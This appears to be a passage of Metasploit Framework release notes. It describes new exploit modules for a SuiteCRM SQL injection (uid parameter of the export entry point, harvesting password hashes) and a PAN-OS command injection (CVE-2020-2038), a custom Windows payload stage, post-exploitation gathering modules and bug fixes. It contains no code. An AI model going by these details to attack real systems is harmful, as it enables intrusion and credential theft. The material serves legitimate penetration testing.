• SuiteCRM authenticated SQL injection in export functionality by Exodus Intelligence, Redouane NIBOUCHA, and jheysel-r7 - This adds support for EIP-0f5d2d7f, a vulnerability in the uid parameter of the index.php?entryPoint=export page on SuiteCRM prior to 7.x prior to 7.12.6 that allows for authenticated SQL injection. The module exploits this SQL injection vulnerability to extract the usernames and password hashes for SuiteCRM users, which can then be cracked offline later to gain access to SuiteCRM.

• Palo Alto Networks Authenticated Remote Code Execution by Mikhail Klyuchnikov, Nikita Abramov, UnD3sc0n0c1d0, and jheysel-r7, which exploits CVE-2020-2038 - This adds an exploit module that leverages an OS Command Injection vulnerability in the PAN-OS management interface versions 10.0 to 10.0.1, versions 9.1.0 to 9.1.4, and version 9.0.0 to 9.0.10. This vulnerability is identified as CVE-2020-2038 and allows authenticated administrators to execute arbitrary OS commands with root privileges.

• #16521 from bwatters-r7 - This adds a 32-bit and 64-bit custom stage Windows payload. The custom stage allows users to provide their own custom executable code to be delivered as the payload stage in place of Meterpreter, Shell and other Metasploit-provided stages.

• #16906 from bcoles - This improves the post/windows/gather/enum_snmp module with shell and Powershell sessions support as well as fixes issues that low-privileged sessions would run into while reading the registry.

Enhancements and features (5)

• #16911 from bcoles - This adds support for non-Meterpreter sessions and for WOW64 Meterpreter sessions to the post/windows/gather/enum_ms_product_keys module.
• #16929 from bcoles - The post/windows/gather/enum_services module has been updated to support non-Meterpreter sessions, to fix some bugs, and to clean up the code. Additionally documentation has been added on how to use the module.
• #16930 from bcoles - This updates the scripts/resource/dev_checks.rc resource script to fix issues and add additional module checks.
• #16953 from bcoles - The enum_domain script has been updated to support Powershell and Shell sessions and its documentation and code have been cleaned up.
• #17008 from EmilioPanti - rpc_core.rb has been updated so that it now reports the number of evasion modules within Metasploit. Previously this statistic wasn't being reported, whilst other statistics like number of exploit modules, auxiliary modules, and payloads were.

Bugs fixed (5)

• #16928 from bcoles - Multiple bugs have been fixed in the Msf::Post::Windows::Service mixin. Additionally, several methods have been adjusted within this mixin so that the data types they use or return are consistent.
• #16998 from adfoster-r7 - Fixes a crash in modules using the IAX2 client.
• #17013 from zeroSteiner - This PR enhances exploit/multi/http/jenkins_script_console to handle changes to the login process for Jenkins newer than version 2.246.
• #17014 from adfoster-r7 - This fixes the exploit/multi/php/ignition_laravel_debug_rce module to use the default HTTP timeout for the check method. Without this, the check method would yield false negatives on slower connections.
• #17018 from adfoster-r7 - This fixes the route add command to use a sensible default netmask.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.2.17...6.2.18
• Full diff 6.2.17...6.2.18

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).